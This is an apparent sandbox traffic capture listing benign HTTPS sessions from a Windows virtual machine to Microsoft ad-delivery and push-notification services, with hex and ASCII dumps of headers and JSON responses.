t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAfs5GOX61lVM8UnUOWdIeg/DUKLjZdbZ80HPE+KG0CZg1HHuvFd/HVDp4/sYdYYGDv0Dfq9A2zc5btmMURBMu0e/948OQ3yFE6rvyf+nT5sTGTGA0qpPnPKlgAnX8SHKgwxUD5fjLnELL4hCV9O03UVxeLA16Darc/N64dlJereDvVoSr3zrS5ui1o97pjJ3soR6U4/kvFX2zVqANP1MKyXciMzNUd9wFKN57fw4/tfq6JULpep0i/+orwdesl7HrLwIQmw4XBm6X9Q2hDsNDAU+xZqwgCissp40y+nJfJHmEzcOeTSI1sfavR1kX+nuk6oGhwp9HCs9l3WzMoaI5SIQZgAAEAKEz1xsRdBVqufY2dM+GruwAahH6beixb5LSUXQ9eG50Sb/fnkBHMOZeffB4iHdrrTTu0GhbMzDOm5CxqKaAbokK6vyKv84y9zNcofzmHUKqMORgnV/FEQGwA+Fm08NjHZpoMh8BxRgcM3Adj7B9rSfEguQvGX4qREAwUMNkj/ArRFay24Fxce0kYaGeetHavuSXOvooiG1Wx6sHJI5GP0J9A1wcxLiYVi/dNzS/b7kvzqUc3WfmAmJKtz0CenJPeeLqdRsbEUWLZBNkwnIPaxIbhIMi+wjI1auRnSU6GXZbH0rTkr/E57qBSed+vA7Jo9WvzEZ0+wSNaDfY3cQsq/WkrDbkF58+nQUrmT76m5ttc9cKJWH3Tm3V4O4SEwxx7oS/XExHvNAje6tExWEyMZwOPq/oHLTvPyU70UPlVY8qCAZp6cPUuufbmnHJvC/djPPPNRs992y7EM+wjcrALZnLQz+QfDmAgpQGfmYBJInA2wMuH7W2xwes+xuDghHK8xeZ6rJcCtq1qDx+a6XAbZwORpCHgIO0sPiWuwO1dlRsd09+WX6Ttp+DZsOC7cZK6OkiNF52ltHiqrsxoTs/k5up9gB&p= Cache-Control: no-cache MS-CV: sdJuoR0mK0isAp6y.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-12-07 09:51:08 UTC	955	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2939 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"RADIDS":"1,P425116219-T1-C128000000001627409+B+P20+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}] X-ARC-SIG: RIlwqmlB6p9tRqSQoFJS6ecOgvkhb2Thyk15EWDvz8fNyAxQf3+Hvgkg6XCbD1l9y55/ExFiAOQJ+FYZP/qsqHX2NSQgLvBIFz55Zowz9I6UgEodFaXYgELX3eNqlpSU7/9F215dYx5uDRhscGf5CpS/oRNGhXqP7hOrdCEOtrHQfDwEWufy4cp162QWZTX6Mu2DZxUb+bXO+0JqLBWz+x0XphlsuzPvJglk63Swwhjp4SNo7wUm6HvihG60ASLjxSzxwXteXoPOcvPPAlQdWAoL7+OM994X9VT4DAwDE2P74oAKzClQpNCBi5FVY56SF/EVIHQGp+ITgVldp1W/qg== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sat, 07 Dec 2024 09:51:07 GMT Connection: close
2024-12-07 09:51:08 UTC	2939	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.6	49709	20.199.58.43	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:07 UTC	2594	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241207T095054Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=18bf555951664276b833c200b44e0201&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=617972&metered=false&nettype=ethernet&npid=sc-310091&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=617972&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAfs5GOX61lVM8UnUOWdIeg/DUKLjZdbZ80HPE+KG0CZg1HHuvFd/HVDp4/sYdYYGDv0Dfq9A2zc5btmMURBMu0e/948OQ3yFE6rvyf+nT5sTGTGA0qpPnPKlgAnX8SHKgwxUD5fjLnELL4hCV9O03UVxeLA16Darc/N64dlJereDvVoSr3zrS5ui1o97pjJ3soR6U4/kvFX2zVqANP1MKyXciMzNUd9wFKN57fw4/tfq6JULpep0i/+orwdesl7HrLwIQmw4XBm6X9Q2hDsNDAU+xZqwgCissp40y+nJfJHmEzcOeTSI1sfavR1kX+nuk6oGhwp9HCs9l3WzMoaI5SIQZgAAEAKEz1xsRdBVqufY2dM+GruwAahH6beixb5LSUXQ9eG50Sb/fnkBHMOZeffB4iHdrrTTu0GhbMzDOm5CxqKaAbokK6vyKv84y9zNcofzmHUKqMORgnV/FEQGwA+Fm08NjHZpoMh8BxRgcM3Adj7B9rSfEguQvGX4qREAwUMNkj/ArRFay24Fxce0kYaGeetHavuSXOvooiG1Wx6sHJI5GP0J9A1wcxLiYVi/dNzS/b7kvzqUc3WfmAmJKtz0CenJPeeLqdRsbEUWLZBNkwnIPaxIbhIMi+wjI1auRnSU6GXZbH0rTkr/E57qBSed+vA7Jo9WvzEZ0+wSNaDfY3cQsq/WkrDbkF58+nQUrmT76m5ttc9cKJWH3Tm3V4O4SEwxx7oS/XExHvNAje6tExWEyMZwOPq/oHLTvPyU70UPlVY8qCAZp6cPUuufbmnHJvC/djPPPNRs992y7EM+wjcrALZnLQz+QfDmAgpQGfmYBJInA2wMuH7W2xwes+xuDghHK8xeZ6rJcCtq1qDx+a6XAbZwORpCHgIO0sPiWuwO1dlRsd09+WX6Ttp+DZsOC7cZK6OkiNF52ltHiqrsxoTs/k5up9gB&p= Cache-Control: no-cache MS-CV: sdJuoR0mK0isAp6y.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-12-07 09:51:08 UTC	814	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 1440 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-ARC-SIG: KwU9GHXQRdYEAZ5GFbUCrdi4MMuJmmn4pVciabkTKSS4NpR2F11eaxqCKx4tDWRHJe7bgdaSYHQOYIxNF0aJ+GnbTDE3nEgcU3SxbiX9fLvQLvGHHlITtwN1ck353QHC8qXa4mCNpWk8ZwIeEVDf3csFgDPKhspVzSiyu/OsJcWI9BS5ORue+EprTL20WXxsExUnQKcehkFC0SzKwiU2U4GARwGdVHUvSCUUsPoStfQC7MYg84b1fDgF4EV18JZGU/Y5cNXTrpCN9sqp6JzBKb6bvq2ENwT66I8/Dg+fsewr0VeWdxcQfR8JLCBMeSZcgNyWsNlw83unsIvhtLjUOQ== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sat, 07 Dec 2024 09:51:07 GMT Connection: close
2024-12-07 09:51:08 UTC	1440	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 45 6d 70 74 79 43 72 65 61 74 69 76 65 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 7d 2c 5c 22 70 72 6f 70 65 72 74 69 65 73 5c 22 3a 7b 7d 2c 5c 22 74 72 61 63 6b 69 6e 67 5c Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"EmptyCreative\",\"propertyManifest\":{},\"properties\":{},\"tracking\

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.6	49714	20.198.119.143	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:14 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 51 75 73 58 32 32 32 38 34 30 4b 57 4a 69 47 75 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 36 34 36 37 39 39 37 39 66 31 35 37 32 66 31 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: QusX222840KWJiGu.1Context: 664679979f1572f1
2024-12-07 09:51:14 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-07 09:51:14 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 51 75 73 58 32 32 32 38 34 30 4b 57 4a 69 47 75 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 36 34 36 37 39 39 37 39 66 31 35 37 32 66 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 62 36 65 63 70 44 62 6d 52 52 73 79 52 37 6c 75 38 45 34 45 6a 38 48 43 6c 43 2f 44 7a 51 33 4c 31 34 45 53 79 4c 79 75 61 34 47 7a 50 64 79 55 76 36 54 33 55 52 77 58 43 59 49 5a 63 55 47 31 78 32 42 76 36 4c 57 4f 4a 74 42 6c 76 50 4c 76 43 55 78 75 64 76 42 79 66 70 47 62 46 36 2b 32 4d 48 2b 62 2b 6f 37 70 2f 4b 6d 32 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: QusX222840KWJiGu.2Context: 664679979f1572f1<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXb6ecpDbmRRsyR7lu8E4Ej8HClC/DzQ3L14ESyLyua4GzPdyUv6T3URwXCYIZcUG1x2Bv6LWOJtBlvPLvCUxudvByfpGbF6+2MH+b+o7p/Km2
2024-12-07 09:51:14 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 51 75 73 58 32 32 32 38 34 30 4b 57 4a 69 47 75 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 36 34 36 37 39 39 37 39 66 31 35 37 32 66 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: QusX222840KWJiGu.3Context: 664679979f1572f1<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-07 09:51:14 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-07 09:51:14 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 55 58 77 62 32 4b 69 36 4f 30 6d 79 78 32 63 4b 36 36 49 35 78 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: UXwb2Ki6O0myx2cK66I5xQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49716	20.199.58.43	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:16 UTC	2587	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241207T095113Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=dd90255ab53d46468c9a0177552d7711&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=617973&metered=false&nettype=ethernet&npid=sc-280815&oemName=lubufd%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=lubufd20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=617973&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waas [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAZyMFkueVF6YQcCvSNBsYpIs4Qd9uYLd1XThPDga/VMIyCy+eMekKh4VSodnFDQ4n9lrkswnaNY8GYQ0LaPFIJzw8cdDovegxQEKXl3uwbQm7avPmaE22/9yfAjtJ4cL7TShgIQ87Ff8bCnRMjTRO0qGPO/W5zq3MPbRDpKMWsFHc5aDZtEbzuZQGnhsSTStKn842VbaQufNbSd6CdSpqbTxIG43Ig/Eeli/gDioys1MWFcaJqBXmLIogUf3OMZs+D0HT1mDwJTd/tcIfn07Ch6BOteR2+4D6lHkPYbyebVpVVGLe8Kh68xjqfktCQLZ9U0Rh7FfPDkLeF1AQDY7HWEQZgAAELvB9khYUktYC0gLd8ASgH6wAW+Pu+FJ/y3GtjMKW1gkUDUXNmQyQ/i1ijgYr1PAYLWHvCbbCNeSNFROlpoxJ+tjtLRfHCFhWVTMy2fdvAkF7XrzG5KCbs8arX4gUeyy890SjhCZJW3sZScGJEhj1V/VDPnpFsrHjgWdZT+g1n11Dclm5ZDUuKklw0SBsjxerjsLpMokLwUA1f5heiBTKw6cXOpu8cOeeNFjCn7oOt+rd4MoMVuW27Az6B3niPuM8EplRl4EDlX12y1OUSE92MXgSoOvapsw8BTUc5+4lbkyXrG6iPfyW8Jg4fRwFdLVV2aUnuGrw8a3BOQmzO7RZrHOLrPV2pdxCjcC6A59cjYEvikJHBycKMqpdZZiGM4rrgCV4YNPFh4SE+82pbzg3hkebn4ChYs7BiDpWq2PwmR137spkVGyusnf8EKexZPvkev4UH2YuI34Fuhcn0LhLyiN6wC8OX7WsGFimLguB2r+nwV5tRi/TjR+ogoMXP2MYzs3iqeg+v9jK1lHhuHTBwFtek9E6rJEqULB+HiBn4Tv0rKe8PDsvKY5KaTlUlWtylYFbndBiTjf/XzLJCjkwQfIZdgB&p= Cache-Control: no-cache MS-CV: w2jGzEZSUUq2aGGz.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-12-07 09:51:17 UTC	955	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2939 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"RADIDS":"1,P425116123-T1-C128000000001627409+B+P20+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}] X-ARC-SIG: Eebv76l2uIkobdGmM5+X8JTxKNxjwhsgHZU4zUkqPgxdh/kIsaAV7c8ncBN+YJAnA9CYGulowE0Jh0vG2+bLFw5VdtHoIrh2gR7AbKk58qdkmtHyYzU+GKS3c27Nb4fSjTu3wxqiOYHw/0eA3a8n15VnYvz/QMSjri4nUysuKjJV06ufrWM1vgzXHq9uzh+6ipn6TSbUwL1YHrXlVwNHI6dCZisRC4TnKnq5woFofWs+Mmrh8N1121roQILirIDulX1RdWEFYRf4KJuJam47AH4q6iIDwKR9yCAiC9SCTDyA/08pO/Cq2q/YFltdFBbVL6YPLvIJ7xX9M8Uax8KNKQ== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sat, 07 Dec 2024 09:51:16 GMT Connection: close
2024-12-07 09:51:17 UTC	2939	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49715	20.199.58.43	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:16 UTC	2594	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241207T095113Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=c06bbfa2e0c44e4cb92d55f7412bd37f&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=617973&metered=false&nettype=ethernet&npid=sc-338388&oemName=lubufd%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=lubufd20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=617973&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAZyMFkueVF6YQcCvSNBsYpIs4Qd9uYLd1XThPDga/VMIyCy+eMekKh4VSodnFDQ4n9lrkswnaNY8GYQ0LaPFIJzw8cdDovegxQEKXl3uwbQm7avPmaE22/9yfAjtJ4cL7TShgIQ87Ff8bCnRMjTRO0qGPO/W5zq3MPbRDpKMWsFHc5aDZtEbzuZQGnhsSTStKn842VbaQufNbSd6CdSpqbTxIG43Ig/Eeli/gDioys1MWFcaJqBXmLIogUf3OMZs+D0HT1mDwJTd/tcIfn07Ch6BOteR2+4D6lHkPYbyebVpVVGLe8Kh68xjqfktCQLZ9U0Rh7FfPDkLeF1AQDY7HWEQZgAAELvB9khYUktYC0gLd8ASgH6wAW+Pu+FJ/y3GtjMKW1gkUDUXNmQyQ/i1ijgYr1PAYLWHvCbbCNeSNFROlpoxJ+tjtLRfHCFhWVTMy2fdvAkF7XrzG5KCbs8arX4gUeyy890SjhCZJW3sZScGJEhj1V/VDPnpFsrHjgWdZT+g1n11Dclm5ZDUuKklw0SBsjxerjsLpMokLwUA1f5heiBTKw6cXOpu8cOeeNFjCn7oOt+rd4MoMVuW27Az6B3niPuM8EplRl4EDlX12y1OUSE92MXgSoOvapsw8BTUc5+4lbkyXrG6iPfyW8Jg4fRwFdLVV2aUnuGrw8a3BOQmzO7RZrHOLrPV2pdxCjcC6A59cjYEvikJHBycKMqpdZZiGM4rrgCV4YNPFh4SE+82pbzg3hkebn4ChYs7BiDpWq2PwmR137spkVGyusnf8EKexZPvkev4UH2YuI34Fuhcn0LhLyiN6wC8OX7WsGFimLguB2r+nwV5tRi/TjR+ogoMXP2MYzs3iqeg+v9jK1lHhuHTBwFtek9E6rJEqULB+HiBn4Tv0rKe8PDsvKY5KaTlUlWtylYFbndBiTjf/XzLJCjkwQfIZdgB&p= Cache-Control: no-cache MS-CV: w2jGzEZSUUq2aGGz.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
